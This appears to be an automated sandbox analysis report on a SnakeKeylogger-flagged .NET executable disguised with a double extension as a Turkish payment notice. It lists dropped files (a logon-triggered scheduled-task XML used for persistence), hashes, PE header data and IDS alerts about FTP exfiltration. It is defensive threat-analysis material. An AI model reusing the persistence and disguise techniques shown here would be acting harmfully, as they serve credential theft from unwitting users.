SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2udamgpn.4ht.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5cfeqqlb.miq.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xrtsjvy.xpt.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e2teh2jh.fsg.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ore2exho.n4u.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vo3sef0r.azf.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wpwtzsyd.zea.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp1AF7.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\SOFcFE.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1600
Entropy (8bit):	5.1177102532808885
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt9xvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTDv
MD5:	1E8227FB1A4E061E9A8391E71A6D6524
SHA1:	582BF5D2A523BA4B826C8F06447079FFB0F449C1
SHA-256:	22CE99490EE59E4ABD33B67F1AE640ED5C68DE6E93F05E6CE672617614A96089
SHA-512:	B3A173937D2302691BEA4A76EAC0983CFD9FF1BBA784701E926E00992F28DED89BC19D9D3F0D35150839285D2DB5C11D806B90A0F5D858DE218A5FF73936BE97
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp

Download File

Process:	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1600
Entropy (8bit):	5.1177102532808885
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt9xvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTDv
MD5:	1E8227FB1A4E061E9A8391E71A6D6524
SHA1:	582BF5D2A523BA4B826C8F06447079FFB0F449C1
SHA-256:	22CE99490EE59E4ABD33B67F1AE640ED5C68DE6E93F05E6CE672617614A96089
SHA-512:	B3A173937D2302691BEA4A76EAC0983CFD9FF1BBA784701E926E00992F28DED89BC19D9D3F0D35150839285D2DB5C11D806B90A0F5D858DE218A5FF73936BE97
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Roaming\SOFcFE.exe

Download File

Process:	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	884224
Entropy (8bit):	7.580132132175222
Encrypted:	false
SSDEEP:	24576:8v2nCRxi02dgg7EC6rgzJnmMJHxxVUY4:8unCRN2dg6ECIWJnmMJRn0
MD5:	BE92B638000820878C7BE0E70E257C95
SHA1:	AF9706BED063D07C65EAC06773C8E6A1ED2E447A
SHA-256:	407DF9654A54792EE72730F5DAE8BD303D7D92A24A5FE0A5BC83F634BAB7A235
SHA-512:	E9331EE0E8AC8EBA302CE4BDCAD38EFAB115D8117818B1DA0D0E51BB5C3DACBF14E1A415D0D779CE1F4E87EDF74A7369ADF1D72417CB49E3696395D2667B17CC
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!.;...............0..r.............. ........@.. ....................................@.................................}...O.......<............................S..p............................................ ............... ..H............text....q... ...r.................. ..`.rsrc...<............t..............@..@.reloc...............\|..............@..B........................H........G..P.......Q...L...@c............................................{...."..}........0...........(....r...po....o....}......}.....(.......(......{....s.......o.....r%..ps.......o......o.......o......,{.+k...o.........J.....J.........,K...(....sR...}.....{....oS.....{.....{....{....rU..p.{....{....( ...o!.......o".......-......,..o#.........,..o#......(.....*......^...........<..........0............{....o$...o%.....{....s.......o.....rY..p.{....\|....(&...r...p( .....s

C:\Users\user\AppData\Roaming\SOFcFE.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.580132132175222
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	GeriOdemeBildirimi942.rar.xlxs.pdf.exe
File size:	884'224 bytes
MD5:	be92b638000820878c7be0e70e257c95
SHA1:	af9706bed063d07c65eac06773c8e6a1ed2e447a
SHA256:	407df9654a54792ee72730f5dae8bd303d7d92a24a5fe0a5bc83f634bab7a235
SHA512:	e9331ee0e8ac8eba302ce4bdcad38efab115d8117818b1da0d0e51bb5c3dacbf14e1a415d0d779ce1f4e87edf74a7369adf1d72417cb49e3696395d2667b17cc
SSDEEP:	24576:8v2nCRxi02dgg7EC6rgzJnmMJHxxVUY4:8unCRN2dg6ECIWJnmMJRn0
TLSH:	7415ADC076296B09DD7947B09539DEB053B42929B019F6D60CCAFBFB39A87035908F87
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!.;...............0..r............... ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4d91d2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xBF3BC221 [Tue Sep 1 20:22:57 2071 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd917d	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xda000	0x63c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xdc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xd538c	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xd71d8	0xd7200	9f6208103beb47a81e2af520b8d3afdd	False	0.8138266723561882	data	7.588327362841595	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xda000	0x63c	0x800	a1715243dcbdc9684ce1d6594cf85e83	False	0.3388671875	data	3.4870763909056315	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xdc000	0xc	0x200	317f9eb7156127ef48069947514e32ba	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xda090	0x3ac	data			0.41595744680851066
RT_MANIFEST	0xda44c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-03T09:16:15.593851+0200	2845532	ETPRO MALWARE SnakeKeylogger Exfil via FTP M1	1	192.168.2.7	49748	119.18.54.39	21	TCP
2024-10-03T09:16:27.343805+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49705	193.122.130.0	80	TCP
2024-10-03T09:16:28.390677+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49705	193.122.130.0	80	TCP
2024-10-03T09:16:29.019175+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49708	188.114.96.3	443	TCP
2024-10-03T09:16:29.596072+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49709	193.122.130.0	80	TCP
2024-10-03T09:16:31.125066+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49711	193.122.130.0	80	TCP
2024-10-03T09:16:32.281413+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49713	193.122.130.0	80	TCP
2024-10-03T09:16:33.218825+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49715	193.122.130.0	80	TCP
2024-10-03T09:16:34.012434+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49716	188.114.96.3	443	TCP
2024-10-03T09:16:35.130195+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49717	132.226.8.169	80	TCP
2024-10-03T09:16:35.738427+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49719	188.114.96.3	443	TCP
2024-10-03T09:16:37.734532+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49722	132.226.8.169	80	TCP
2024-10-03T09:16:39.000117+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49721	132.226.8.169	80	TCP
2024-10-03T09:16:40.625110+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49726	132.226.8.169	80	TCP
2024-10-03T09:16:41.179897+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49728	188.114.96.3	443	TCP
2024-10-03T09:16:43.078198+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49721	132.226.8.169	80	TCP
2024-10-03T09:16:43.623130+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49730	188.114.96.3	443	TCP
2024-10-03T09:16:45.015722+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49731	132.226.8.169	80	TCP
2024-10-03T09:16:45.677275+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49732	188.114.96.3	443	TCP
2024-10-03T09:16:48.759459+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49735	188.114.96.3	443	TCP
2024-10-03T09:16:54.749860+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49743	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 09:16:26.721208096 CEST	49705	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:26.726375103 CEST	80	49705	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:26.726449966 CEST	49705	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:26.726809978 CEST	49705	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:26.731622934 CEST	80	49705	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:27.191643953 CEST	80	49705	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:27.199314117 CEST	49705	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:27.204387903 CEST	80	49705	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:27.298789978 CEST	80	49705	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:27.343805075 CEST	49705	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:27.415430069 CEST	49706	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:27.415467978 CEST	443	49706	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:27.415793896 CEST	49706	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:27.489902020 CEST	49706	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:27.489939928 CEST	443	49706	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:27.952193975 CEST	443	49706	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:27.952280045 CEST	49706	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:27.971955061 CEST	49706	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:27.971991062 CEST	443	49706	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:27.973074913 CEST	443	49706	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:28.015707016 CEST	49706	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:28.100166082 CEST	49706	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:28.147437096 CEST	443	49706	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:28.205713034 CEST	443	49706	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:28.205833912 CEST	443	49706	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:28.206033945 CEST	49706	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:28.234287024 CEST	49706	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:28.241403103 CEST	49705	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:28.246465921 CEST	80	49705	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:28.342165947 CEST	80	49705	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:28.390676975 CEST	49705	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:28.398412943 CEST	49708	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:28.398461103 CEST	443	49708	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:28.398597002 CEST	49708	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:28.410903931 CEST	49708	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:28.410928011 CEST	443	49708	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:28.872119904 CEST	443	49708	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:28.905817986 CEST	49708	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:28.905841112 CEST	443	49708	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:29.019217014 CEST	443	49708	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:29.019345045 CEST	443	49708	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:29.019459963 CEST	49708	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:29.020028114 CEST	49708	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:29.025202036 CEST	49705	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:29.027329922 CEST	49709	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:29.030493021 CEST	80	49705	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:29.030561924 CEST	49705	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:29.032222986 CEST	80	49709	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:29.035584927 CEST	49709	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:29.045275927 CEST	49709	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:29.050235033 CEST	80	49709	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:29.520260096 CEST	80	49709	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:29.596071959 CEST	49709	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:29.600321054 CEST	49710	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:29.600375891 CEST	443	49710	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:29.600976944 CEST	49710	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:29.761765003 CEST	49710	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:29.761814117 CEST	443	49710	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:30.225670099 CEST	443	49710	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:30.293953896 CEST	49710	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:30.324580908 CEST	49710	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:30.324609995 CEST	443	49710	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:30.431740999 CEST	443	49710	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:30.431857109 CEST	443	49710	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:30.431920052 CEST	49710	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:30.457736969 CEST	49710	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:30.523538113 CEST	49709	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:30.526504040 CEST	49711	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:30.531493902 CEST	80	49711	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:30.531577110 CEST	49711	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:30.533427954 CEST	49711	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:30.538557053 CEST	80	49711	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:30.540883064 CEST	80	49709	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:30.540966034 CEST	49709	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:30.994785070 CEST	80	49711	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:30.996088028 CEST	49712	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:30.996151924 CEST	443	49712	188.114.96.3	192.168.2.7
